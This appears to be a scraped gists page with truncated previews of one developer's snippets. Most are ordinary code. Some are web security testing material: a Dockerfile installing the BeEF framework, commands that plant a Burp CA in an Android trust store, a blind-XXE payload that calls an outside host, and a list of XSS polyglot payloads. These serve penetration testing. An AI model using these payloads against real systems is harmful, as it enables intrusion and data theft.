This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var mynamespace = mynamespace || {}; | |
(function(){ | |
var counter = { count: 0 }; | |
function incrementCounter(){ | |
counter.count++; | |
} | |
mynamespace.someobject = { | |
counter : counter, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
a = "javascript:evil();\nhttp://www.vg.no" | |
if a =~ /^https?/ then | |
puts "This is a safe url starting with http or https" | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ubuntu | |
RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl | |
RUN apt-get install -y software-properties-common && \ | |
apt-add-repository -y ppa:brightbox/ruby-ng && \ | |
apt-get update && \ | |
apt-get install -y ruby2.1 ruby2.1-dev | |
WORKDIR /opt/ | |
RUN locale-gen en_US.UTF-8 | |
ENV LC_ALL en_US.UTF-8 | |
RUN curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz && \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var oldCreateElement = document.createElement; | |
document.createElement = function() { | |
var element = oldCreateElement.apply(document, arguments); | |
var oldSetAttribute = element.setAttribute; | |
console.log(arguments, element); | |
element.setAttribute = function(name, value) { | |
if (name == "onsubmit") { | |
console.log(arguments.callee.caller.toString()); | |
} | |
oldSetAttribute.apply(element, arguments); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Dog { | |
private Tail tail; | |
private Head head; | |
public Dog() { | |
this(new TailImpl(), new HeadImpl()) | |
} | |
public Dog(Tail tail, Head head) { | |
this.tail = tail; | |
this.head = head; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package no.posten.dpost.sosm; | |
import java.io.ByteArrayInputStream; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.net.URL; | |
import java.security.AccessController; | |
import java.security.CodeSigner; | |
import java.security.CodeSource; | |
import java.security.PrivilegedAction; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html | |
adb shell mount -o rw,remount /system | |
openssl x509 -in burp.cer -inform DER -text | |
openssl x509 -noout -subject_hash_old -inform DER -in burp.cer | |
adb push burp.cer /system/etc/security/cacerts/9a5ba575.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> | |
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> | |
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` | |
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` | |
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> | |
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> | |
javascript:`</template>\"///"//< |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
export COLOR_NC=$(tput sgr0) | |
export COLOR_GREEN=$(tput setaf 2) | |
if [ $# -ne 2 ]; then | |
echo "ERROR: no image given" | |
echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>" | |
exit 1 | |
fi |